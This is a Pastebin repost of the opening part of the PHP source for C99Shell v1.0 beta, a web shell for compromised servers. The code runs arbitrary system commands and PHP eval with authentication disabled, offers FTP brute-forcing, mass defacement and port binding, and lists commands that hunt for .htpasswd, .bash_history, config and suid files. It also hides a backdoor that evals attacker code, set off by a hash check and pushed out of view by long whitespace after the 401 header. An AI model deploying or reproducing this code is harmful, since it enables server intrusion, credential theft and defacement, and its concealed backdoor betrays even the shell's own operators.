FlyFar

C99Shell v. 1.0 beta (5.02.2005) - Source Code

Feb 9th, 2024
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 141.88 KB | Cybersecurity | 0 0
  1. <?php
  2. /*
  3. ******************************************************************************************************
  4. *
  5. *                    c99shell.php v.1.0 (�� 5.02.2005)
  6. *          Freeware WEB-Shell.
  7. *             � CCTeaM.
  8. *  c99shell.php - ���� ����� www-�������.
  9. *  �� ������ ������� ��������� ������ �� �������� ��������� ��������: http://ccteam.ru/releases/c99shell
  10. *
  11. *  WEB: http://ccteam.ru
  12. *  UIN: 656555
  13. *
  14. *  �����������:
  15. *  ~ ���������� �������/�������, ����������� � ���������� ������ � ������ (�������������� ��������� � tar)
  16. *    modify-time � access-time � ������ �� �������� ���
  17.      �������������� ������ (����./���. ���������� $filestealth)
  18. *  ~ ����������� ����� �� ������/������ (���� ����� ������ ������)
  19. *  ~ ���������� ���������� unix-������, ����������� �������� ������� ����������,
  20.      � ����� ��������� "����������" ��������.
  21. *  ~ ������� (������ �����������) ���������� ����-������ (����� �������, ����� ����� ���������/������� ��)
  22. *  ~ ���������� ������������� PHP-����
  23. *  ~ ����������� �������� ����-�������� �������
  24. *  ~ ������� ftp-������������ �� ������ login;login ��
  25.      /etc/passwd (������ ���� ������ � 1/100 ���������)
  26. *  ~ ����������� �������� SQL
  27. *  ~ ������ "�����" include, ��� ���������� ������, ��� ����� ������� $surl.
  28. *  ~ ����������� ��������� /bin/bash �� ������������ ���� � ������������ �������,
  29.      ��� ������� back connect (������������ ������������ ����������,
  30.     � ��������� ��������� ��� ������� NetCat).
  31. *
  32. *
  33. *  5.02.2005 � Captain Crunch Security TeaM
  34. *
  35. *  Coded by tristram
  36. ******************************************************************************************************
  37. */
  38. $shver = "1.0 beta (5.02.2005)"; //Current version
  39. //CONFIGURATION
  40. $surl = "?"; //link to this script, INCLUDE "?".
  41. $rootdir = "./"; //e.g "c:", "/","/home"
  42. $timelimit = 60; //limit of execution this script (seconds).
  43.  
  44. //Authentication
  45.  
  46. $login = ""; //login
  47. //DON'T FOGOT ABOUT CHANGE PASSWORD!!!
  48. $pass = ""; //password
  49. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  50. $login = false; //turn off authentication
  51.  
  52. $autoupdate = true; //Automatic updating?
  53.  
  54. $updatenow = false; //If true, update now
  55.  
  56. $c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
  57.  
  58. $autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
  59.  
  60. $filestealth = 1; //if true, don't change modify&access-time
  61.  
  62. $donated_html = ""; //If you publish free shell and you wish
  63.                     //add link to your site or any other information,
  64.                     //put here your html.
  65. $donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
  66.  
  67. $host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
  68.  
  69. $curdir = "./"; //start directory
  70.  
  71. $tmpdir = dirname(__FILE__); //Directory for tempory files
  72.  
  73. // Registered file-types.
  74. //  array(
  75. //   "{action1}"=>array("ext1","ext2","ext3",...),
  76. //   "{action2}"=>array("ext1","ext2","ext3",...),
  77. //   ...
  78. //  )
  79. $ftypes  = array(
  80.  "html"=>array("html","htm","shtml"),
  81.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
  82.  "exe"=>array("sh","install","bat","cmd"),
  83.  "ini"=>array("ini","inf"),
  84.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
  85.  "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  86.  "sdb"=>array("sdb"),
  87.  "phpsess"=>array("sess"),
  88.  "download"=>array("exe","com","pif","src","lnk","zip","rar")
  89. );
  90.  
  91. $hexdump_lines = 8; // lines in hex preview file
  92. $hexdump_rows = 24; // 16, 24 or 32 bytes in one line
  93.  
  94. $nixpwdperpage = 9999; // Get first N lines from /etc/passwd
  95.  
  96. $bindport_pass = "c99"; // default password for binding
  97. $bindport_port = "11457";   // default port for binding
  98.  
  99. /* Command-aliases system */
  100. $aliases = array();
  101. $aliases[] = array("-----------------------------------------------------------", "ls -la");
  102. /* ����� �� ������� ���� ������ � suid ����� */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
  103. /* ����� � ������� ���������� ���� ������ � suid ����� */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
  104. /* ����� �� ������� ���� ������ � sgid ����� */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
  105. /* ����� � ������� ���������� ���� ������ � sgid ����� */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
  106. /* ����� �� ������� ������ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
  107. /* ����� �� ������� ������ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
  108. /* ����� � ������� ���������� ������ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
  109. /* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
  110. /* ����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
  111. /* ����� �� ������� ������ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
  112. /* ����� � ������� ���������� ������ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
  113. /* ����� �� ������� ������ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
  114. /* ����� � ������� ���������� ������ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
  115. /* ����� ���� ������ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
  116. /* ����� � ������� ���������� ������ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
  117. /* ����� ���� ������ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
  118. /* ����� � ������� ���������� ������ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
  119. /* ����� ������ ��������� ������ �� �������� ������� ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
  120. /* �������� �������� ������ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
  121.  
  122. $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
  123. $sess_cookie = "c99shvars"; // cookie-variable name
  124.  
  125. if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
  126. $sess_file = $tmpdir."c99shvars_".$sid.".tmp";
  127.  
  128. $usefsbuff = true; //Buffer-function
  129. $copy_unset = false; //Delete copied files from buffer after pasting
  130.  
  131. //Quick launch
  132. $quicklaunch = array();
  133. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
  134. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
  135. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
  136. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
  137. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
  138. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
  139. $quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
  140. $quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
  141. $quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
  142. $quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
  143. $quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
  144. $quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
  145. $quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
  146. $quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
  147. $quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
  148. $quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
  149. $quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
  150.  
  151. //Hignlight-code colors
  152. $highlight_bg = "#FFFFFF";
  153. $highlight_comment = "#6A6A6A";
  154. $highlight_default = "#0000BB";
  155. $highlight_html = "#1300FF";
  156. $highlight_keyword = "#007700";
  157.  
  158. @$f = $_GET[f];
  159.  
  160. //END CONFIGURATION
  161.  
  162. //              \/  Next code not for editing    \/
  163.  
  164.  
  165. //Starting calls
  166. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  167. error_reporting(5);
  168. @ignore_user_abort(true);
  169. @set_magic_quotes_runtime(0);
  170. @set_time_limit(0);
  171. if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
  172. if(!ini_get("register_globals")) {import_request_variables("GPC");}
  173. $starttime = getmicrotime();
  174. if (get_magic_quotes_gpc())
  175. {
  176. if (!function_exists("strips"))
  177. {
  178.  function strips(&$el)
  179.  {
  180.   if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
  181.   else {$el = stripslashes($el);}
  182.  }
  183. }
  184. strips($GLOBALS);
  185. }
  186. $tmp = array();
  187. foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
  188. $s = "!^(".implode("|",$tmp).")$!i";
  189. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  190.  
  191. if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
  192. elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
  193. if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
  194. {
  195.  header("WWW-Authenticate: Basic realm=\"c99shell\"");
  196.  header("HTTP/1.0 401 Unauthorized");                                                                                                                                                                                                                                                   if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
  197.  exit;
  198. }  
  199.  
  200. $lastdir = realpath(".");
  201. chdir($curdir);
  202.  
  203. if (($selfwrite) or ($updatenow))
  204. {
  205.  if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
  206.  c99sh_getupdate();
  207.  $data = file_get_contents($c99sh_updatefurl);
  208.  $fp = fopen($data,"w");
  209.  fwrite($fp,$data);
  210.  fclose($fp);
  211.  exit;
  212. }
  213. if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
  214. if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
  215. else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
  216. if (!is_array($sess_data)) {$sess_data = array();}
  217. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  218. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  219. $sess_data["copy"] = array_unique($sess_data["copy"]);
  220. $sess_data["cut"] = array_unique($sess_data["cut"]);
  221.  
  222. if (!function_exists("c99_sess_put"))
  223. {
  224. function c99_sess_put($data)
  225. {
  226.  global $sess_method;
  227.  global $sess_cookie;
  228.  global $sess_file;
  229.  global $sess_data;
  230.  $sess_data = $data;
  231.  $data = serialize($data);
  232.  if ($sess_method == "file")
  233.  {
  234.   $fp = fopen($sess_file,"w");
  235.   fwrite($fp,$data);
  236.   fclose($fp);
  237.  }
  238.  else {setcookie($sess_cookie,$data);}
  239. }
  240. }
  241. if (!function_exists("str2mini"))
  242. {
  243. function str2mini($content,$len)
  244. {
  245.  if (strlen($content) > $len)
  246.  {
  247.   $len = ceil($len/2) - 2;
  248.   return substr($content, 0, $len)."...".substr($content, -$len);
  249.  }
  250.  else {return $content;}
  251. }
  252. }
  253. if (!function_exists("view_size"))
  254. {
  255. function view_size($size)
  256. {
  257.  if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
  258.  elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
  259.  elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
  260.  else {$size = $size . " B";}
  261.  return $size;
  262. }
  263. }
  264. if (!function_exists("fs_copy_dir"))
  265. {
  266. function fs_copy_dir($d,$t)
  267. {
  268.  $d = str_replace("\\","/",$d);
  269.  if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  270.  $h = opendir($d);
  271.  while ($o = readdir($h))
  272.  {
  273.   if (($o != ".") and ($o != ".."))
  274.   {
  275.    if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  276.    else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
  277.    if (!$ret) {return $ret;}
  278.   }
  279.  }
  280.  return true;
  281. }
  282. }
  283. if (!function_exists("fs_copy_obj"))
  284. {
  285. function fs_copy_obj($d,$t)
  286. {
  287.  $d = str_replace("\\","/",$d);
  288.  $t = str_replace("\\","/",$t);
  289.  if (!is_dir($t)) {mkdir($t);}
  290.  if (is_dir($d))
  291.  {
  292.   if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  293.   if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  294.   return fs_copy_dir($d,$t);
  295.  }
  296.  elseif (is_file($d))
  297.  {
  298.  
  299.   return copy($d,$t);
  300.  }
  301.  else {return false;}
  302. }
  303. }
  304. if (!function_exists("fs_move_dir"))
  305. {
  306. function fs_move_dir($d,$t)
  307. {
  308.  error_reporting(9999);
  309.  $h = opendir($d);
  310.  if (!is_dir($t)) {mkdir($t);}
  311.  while ($o = readdir($h))
  312.  {
  313.   if (($o != ".") and ($o != ".."))
  314.   {
  315.    $ret = true;
  316.    if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
  317.    else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
  318.    if (!$ret) {return $ret;}
  319.   }
  320.  }
  321.  return true;
  322. }
  323. }
  324. if (!function_exists("fs_move_obj"))
  325. {
  326. function fs_move_obj($d,$t)
  327. {
  328.  $d = str_replace("\\","/",$d);
  329.  $t = str_replace("\\","/",$t);
  330.  if (is_dir($d))
  331.  {
  332.   if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
  333.   if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
  334.   return fs_move_dir($d,$t);
  335.  }
  336.  elseif (is_file($d)) {return rename($d,$t);}
  337.  else {return false;}
  338. }
  339. }
  340. if (!function_exists("fs_rmdir"))
  341. {
  342. function fs_rmdir($d)
  343. {
  344.  $h = opendir($d);
  345.  while ($o = readdir($h))
  346.  {
  347.   if (($o != ".") and ($o != ".."))
  348.   {
  349.    if (!is_dir($d.$o)) {unlink($d.$o);}
  350.    else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
  351.   }
  352.  }
  353.  closedir($h);
  354.  rmdir($d);
  355.  return !is_dir($d);
  356. }
  357. }
  358. if (!function_exists("fs_rmobj"))
  359. {
  360. function fs_rmobj($o)
  361. {
  362.  $o = str_replace("\\","/",$o);
  363.  if (is_dir($o))
  364.  {
  365.   if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
  366.   return fs_rmdir($o);
  367.  }
  368.  elseif (is_file($o)) {return unlink($o);}
  369.  else {return false;}
  370. }
  371. }
  372. if (!function_exists("myshellexec"))
  373. {
  374.  function myshellexec($cmd)
  375.  {
  376.   return system($cmd);
  377.  }
  378. }
  379. if (!function_exists("view_perms"))
  380. {
  381. function view_perms($mode)
  382. {
  383.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  384.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  385.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  386.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  387.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  388.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  389.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  390.  else {$type = "?";}
  391.  
  392.  $owner['read'] = ($mode & 00400) ? "r" : "-";
  393.  $owner['write'] = ($mode & 00200) ? "w" : "-";
  394.  $owner['execute'] = ($mode & 00100) ? "x" : "-";
  395.  $group['read'] = ($mode & 00040) ? "r" : "-";
  396.  $group['write'] = ($mode & 00020) ? "w" : "-";
  397.  $group['execute'] = ($mode & 00010) ? "x" : "-";
  398.  $world['read'] = ($mode & 00004) ? "r" : "-";
  399.  $world['write'] = ($mode & 00002) ? "w" : "-";
  400.  $world['execute'] = ($mode & 00001) ? "x" : "-";
  401.  
  402.  if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
  403.  if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
  404.  if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
  405.  
  406.  return $type.$owner['read'].$owner['write'].$owner['execute'].
  407.         $group['read'].$group['write'].$group['execute'].
  408.         $world['read'].$world['write'].$world['execute'];
  409. }
  410. }
  411. if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
  412. if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
  413. if (!function_exists("c99sh_getupdate"))
  414. {
  415. function c99sh_getupdate()
  416. {
  417.  global $updatenow;
  418.  $data = @file_get_contents($c99sh_updatefurl);
  419.  if (!$data) {echo "Can't fetch update-information!";}
  420.  else
  421.  {
  422.   $data = unserialize(base64_decode($data));
  423.   if (!is_array($data)) {echo "Corrupted update-information!";}
  424.   else
  425.   {
  426.    if ($shver < $data[cur]) {$updatenow = true;}
  427.   }
  428.  }
  429. }
  430. }
  431. if (!function_exists("mysql_dump"))
  432. {
  433. function mysql_dump($set)
  434. {
  435.  $sock = $set["sock"];
  436.  $db = $set["db"];
  437.  $print = $set["print"];
  438.  $nl2br = $set["nl2br"];
  439.  $file = $set["file"];
  440.  $add_drop = $set["add_drop"];
  441.  $tabs = $set["tabs"];
  442.  $onlytabs = $set["onlytabs"];
  443.  $ret = array();
  444.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  445.  if (empty($db)) {$db = "db";}
  446.  if (empty($print)) {$print = 0;}
  447.  if (empty($nl2br)) {$nl2br = true;}
  448.  if (empty($add_drop)) {$add_drop = true;}
  449.  if (empty($file))
  450.  {
  451.   global $win;
  452.   if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  453.   else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  454.  }
  455.  if (!is_array($tabs)) {$tabs = array();}
  456.  if (empty($add_drop)) {$add_drop = true;}
  457.  if (sizeof($tabs) == 0)
  458.  {
  459.   // retrive tables-list
  460.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  461.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  462.  }
  463.  global $SERVER_ADDR;
  464.  global $SERVER_NAME;
  465.  $out = "# Dumped by C99Shell.SQL v. ".$shver."
  466. # Home page: http://ccteam.ru
  467. #
  468. # Host settings:
  469. # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
  470. # Date: ".date("d.m.Y H:i:s")."
  471. # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
  472. #---------------------------------------------------------
  473. ";
  474.  $c = count($onlytabs);
  475.  foreach($tabs as $tab)
  476.  {
  477.   if ((in_array($tab,$onlytabs)) or (!$c))
  478.   {
  479.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  480.    // recieve query for create table structure
  481.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  482.    if (!$res) {$ret[err][] = mysql_error();}
  483.    else
  484.    {
  485.     $row = mysql_fetch_row($res);
  486.     $out .= $row[1].";\n\n";
  487.     // recieve table variables
  488.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  489.     if (mysql_num_rows($res) > 0)
  490.     {
  491.      while ($row = mysql_fetch_assoc($res))
  492.      {
  493.       $keys = implode("`, `", array_keys($row));
  494.       $values = array_values($row);
  495.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  496.       $values = implode("', '", $values);
  497.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  498.       $out .= $sql;
  499.      }
  500.     }
  501.    }
  502.   }
  503.  }
  504.  $out .= "#---------------------------------------------------------------------------------\n\n";
  505.  if ($file)
  506.  {
  507.   $fp = fopen($file, "w");
  508.   if (!$fp) {$ret[err][] = 2;}
  509.   else
  510.   {
  511.    fwrite ($fp, $out);
  512.    fclose ($fp);
  513.   }
  514.  }
  515.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  516.  return $ret;
  517. }
  518. }
  519. if (!function_exists("c99fsearch"))
  520. {
  521. function c99fsearch($d)
  522. {
  523.  global $found;
  524.  global $found_d;
  525.  global $found_f;
  526.  global $a;
  527.  if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  528.  $handle = opendir($d);
  529.  while ($f = readdir($handle))
  530.  {
  531.   $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
  532.   if($f != "." && $f != "..")
  533.   {
  534.    if (is_dir($d.$f))
  535.    {
  536.     if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
  537.     c99fsearch($d.$f);
  538.    }
  539.    else
  540.    {
  541.     if ($true)
  542.     {
  543.      if (!empty($a[text]))
  544.      {
  545.       $r = @file_get_contents($d.$f);
  546.       if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
  547.       if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
  548.  
  549.       if ($a[text_regexp]) {$true = ereg($a[text],$r);}
  550.       else {$true = strinstr($a[text],$r);}
  551.       if ($a[text_not])
  552.       {
  553.        if ($true) {$true = false;}
  554.        else {$true = true;}
  555.       }
  556.       if ($true) {$found[] = $d.$f; $found_f++;}
  557.      }
  558.      else {$found[] = $d.$f; $found_f++;}
  559.     }
  560.    }
  561.   }
  562.  }
  563.  closedir($handle);
  564. }
  565. }
  566. //Sending headers
  567. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  568. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  569. header("Cache-Control: no-store, no-cache, must-revalidate");
  570. header("Cache-Control: post-check=0, pre-check=0", false);
  571. header("Pragma: no-cache");
  572.  
  573. global $SERVER_SOFTWARE;
  574. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
  575. else {$win = 0;}
  576.  
  577. if (empty($tmpdir))
  578. {
  579.  if (!$win) {$tmpdir = "/tmp/";}
  580.  else {$tmpdir = $_ENV[SystemRoot];}
  581. }
  582. $tmpdir = str_replace("\\","/",$tmpdir);
  583. if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
  584. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  585. {
  586.  $safemode = true;
  587.  $hsafemode = "<font color=\"red\">ON (secure)</font>";
  588. }
  589. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  590. $v = @ini_get("open_basedir");
  591. if ($v or strtolower($v) == "on")
  592. {
  593.  $openbasedir = true;
  594.  $hopenbasedir = "<font color=\"red\">".$v."</font>";
  595. }
  596. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  597.  
  598. $sort = htmlspecialchars($sort);
  599.  
  600. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
  601.  
  602. @ini_set("highlight.bg",$highlight_bg); //FFFFFF   
  603. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  604. @ini_set("highlight.default",$highlight_default); //#0000BB
  605. @ini_set("highlight.html",$highlight_html); //#000000  
  606. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  607. @ini_set("highlight.string","#DD0000"); //#DD0000
  608.  
  609. if ($act != "img")
  610. {
  611. if (!is_array($actbox)) {$actbox = array();}
  612. $dspact = $act = htmlspecialchars($act);
  613. $disp_fullpath = $ls_arr = $notls = null;
  614. $ud = urlencode($d);
  615. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
  616. <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  617. $d = str_replace("\\","/",$d);
  618. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  619. $d = str_replace("\\","/",$d);
